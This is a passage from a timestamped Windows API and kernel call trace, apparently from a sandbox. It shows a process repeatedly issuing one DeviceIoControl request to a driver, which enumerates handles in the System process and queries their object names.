PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.569] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8bab0, HandleInformation=0x0) returned 0x0 [0119.569] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.569] PsReleaseProcessExitSynchronization () returned 0x2 [0119.569] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.569] ObQueryNameString (in: Object=0xfffffa8001f8bab0, ObjectNameInfo=0xfffffa8002888044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002888044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.569] ObfDereferenceObject (Object=0xfffffa8001f8bab0) returned 0x2 [0119.569] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.569] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.569] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.569] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.569] PsAcquireProcessExitSynchronization () returned 0x0 [0119.569] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.569] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f82d20, HandleInformation=0x0) returned 0x0 [0119.569] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.569] PsReleaseProcessExitSynchronization () returned 0x2 [0119.569] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.570] ObQueryNameString (in: Object=0xfffffa8001f82d20, ObjectNameInfo=0xfffffa8002889044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002889044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.570] ObfDereferenceObject (Object=0xfffffa8001f82d20) returned 0x2 [0119.570] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.570] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.570] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.570] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.570] PsAcquireProcessExitSynchronization () returned 0x0 [0119.570] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.570] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8af20, HandleInformation=0x0) returned 0x0 [0119.570] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.570] PsReleaseProcessExitSynchronization () returned 0x2 [0119.570] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.570] ObQueryNameString (in: Object=0xfffffa8001f8af20, ObjectNameInfo=0xfffffa800290a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290a044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.570] ObfDereferenceObject (Object=0xfffffa8001f8af20) returned 0x2 [0119.570] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.570] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.570] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.570] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.570] PsAcquireProcessExitSynchronization () returned 0x0 [0119.570] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.570] ObReferenceObjectByHandle (in: Handle=0xffffffff800006bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f812c0, HandleInformation=0x0) returned 0x0 [0119.570] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.570] PsReleaseProcessExitSynchronization () returned 0x2 [0119.570] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.570] ObQueryNameString (in: Object=0xfffffa8001f812c0, ObjectNameInfo=0xfffffa80026a61c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a61c4, ReturnLength=0xfffff88005163550) returned 0x0 [0119.570] ObfDereferenceObject (Object=0xfffffa8001f812c0) returned 0x2 [0119.571] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.571] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.571] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.571] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.571] PsAcquireProcessExitSynchronization () returned 0x0 [0119.571] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.571] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8a980, HandleInformation=0x0) returned 0x0 [0119.571] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.571] PsReleaseProcessExitSynchronization () returned 0x2 [0119.571] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.571] ObQueryNameString (in: Object=0xfffffa8001f8a980, ObjectNameInfo=0xfffffa80028f2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028f2044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.571] ObfDereferenceObject (Object=0xfffffa8001f8a980) returned 0x2 [0119.571] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.571] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.571] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.571] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.571] PsAcquireProcessExitSynchronization () returned 0x0 [0119.571] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.571] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f83e50, HandleInformation=0x0) returned 0x0 [0119.571] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.571] PsReleaseProcessExitSynchronization () returned 0x2 [0119.571] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.571] ObQueryNameString (in: Object=0xfffffa8001f83e50, ObjectNameInfo=0xfffffa800290d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290d044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.571] ObfDereferenceObject (Object=0xfffffa8001f83e50) returned 0x2 [0119.571] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.572] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.572] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.572] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.572] PsAcquireProcessExitSynchronization () returned 0x0 [0119.572] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.572] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f882f0, HandleInformation=0x0) returned 0x0 [0119.572] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.572] PsReleaseProcessExitSynchronization () returned 0x2 [0119.572] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.573] ObQueryNameString (in: Object=0xfffffa8001f882f0, ObjectNameInfo=0xfffffa800290c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290c044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.573] ObfDereferenceObject (Object=0xfffffa8001f882f0) returned 0x2 [0119.573] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.573] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.573] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.573] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.573] PsAcquireProcessExitSynchronization () returned 0x0 [0119.573] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.573] ObReferenceObjectByHandle (in: Handle=0xffffffff800006cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f82460, HandleInformation=0x0) returned 0x0 [0119.573] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.573] PsReleaseProcessExitSynchronization () returned 0x2 [0119.573] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.573] ObQueryNameString (in: Object=0xfffffa8001f82460, ObjectNameInfo=0xfffffa800290b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290b044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.573] ObfDereferenceObject (Object=0xfffffa8001f82460) returned 0x2 [0119.573] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.573] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.573] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.573] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.573] PsAcquireProcessExitSynchronization () returned 0x0 [0119.573] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.573] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f898b0, HandleInformation=0x0) returned 0x0 [0119.573] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.573] PsReleaseProcessExitSynchronization () returned 0x2 [0119.573] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.574] ObQueryNameString (in: Object=0xfffffa8001f898b0, ObjectNameInfo=0xfffffa8002908044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002908044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.574] ObfDereferenceObject (Object=0xfffffa8001f898b0) returned 0x2 [0119.574] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.574] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.574] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.574] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.574] PsAcquireProcessExitSynchronization () returned 0x0 [0119.574] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.574] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f84f20, HandleInformation=0x0) returned 0x0 [0119.574] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.574] PsReleaseProcessExitSynchronization () returned 0x2 [0119.574] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.574] ObQueryNameString (in: Object=0xfffffa8001f84f20, ObjectNameInfo=0xfffffa8002907044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002907044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.574] ObfDereferenceObject (Object=0xfffffa8001f84f20) returned 0x2 [0119.574] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.574] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.574] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.574] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.574] PsAcquireProcessExitSynchronization () returned 0x0 [0119.574] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.574] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f88d20, HandleInformation=0x0) returned 0x0 [0119.575] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.575] PsReleaseProcessExitSynchronization () returned 0x2 [0119.575] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.575] ObQueryNameString (in: Object=0xfffffa8001f88d20, ObjectNameInfo=0xfffffa800290f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290f044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.575] ObfDereferenceObject (Object=0xfffffa8001f88d20) returned 0x2 [0119.575] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.575] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.575] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.575] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.575] PsAcquireProcessExitSynchronization () returned 0x0 [0119.575] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.575] ObReferenceObjectByHandle (in: Handle=0xffffffff800006dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f83590, HandleInformation=0x0) returned 0x0 [0119.575] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.575] PsReleaseProcessExitSynchronization () returned 0x2 [0119.575] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.575] ObQueryNameString (in: Object=0xfffffa8001f83590, ObjectNameInfo=0xfffffa8002923044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002923044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.575] ObfDereferenceObject (Object=0xfffffa8001f83590) returned 0x2 [0119.575] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.575] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.575] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.575] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.575] PsAcquireProcessExitSynchronization () returned 0x0 [0119.576] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.576] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f88780, HandleInformation=0x0) returned 0x0 [0119.576] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.576] PsReleaseProcessExitSynchronization () returned 0x2 [0119.576] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.576] ObQueryNameString (in: Object=0xfffffa8001f88780, ObjectNameInfo=0xfffffa8002924044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002924044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.576] ObfDereferenceObject (Object=0xfffffa8001f88780) returned 0x2 [0119.576] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.576] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.576] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.576] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.576] PsAcquireProcessExitSynchronization () returned 0x0 [0119.576] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.576] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f852c0, HandleInformation=0x0) returned 0x0 [0119.576] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.576] PsReleaseProcessExitSynchronization () returned 0x2 [0119.576] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.576] ObQueryNameString (in: Object=0xfffffa8001f852c0, ObjectNameInfo=0xfffffa8002925044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002925044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.576] ObfDereferenceObject (Object=0xfffffa8001f852c0) returned 0x2 [0119.576] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.576] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.576] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.576] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.576] PsAcquireProcessExitSynchronization () returned 0x0 [0119.576] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.577] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f86350, HandleInformation=0x0) returned 0x0 [0119.577] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.577] PsReleaseProcessExitSynchronization () returned 0x2 [0119.577] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.577] ObQueryNameString (in: Object=0xfffffa8001f86350, ObjectNameInfo=0xfffffa8002926044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002926044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.577] ObfDereferenceObject (Object=0xfffffa8001f86350) returned 0x2 [0119.577] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.577] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.577] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.577] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.577] PsAcquireProcessExitSynchronization () returned 0x0 [0119.577] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.577] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f84660, HandleInformation=0x0) returned 0x0 [0119.577] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.577] PsReleaseProcessExitSynchronization () returned 0x2 [0119.577] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.577] ObQueryNameString (in: Object=0xfffffa8001f84660, ObjectNameInfo=0xfffffa8002927044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002927044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.577] ObfDereferenceObject (Object=0xfffffa8001f84660) returned 0x2 [0119.577] 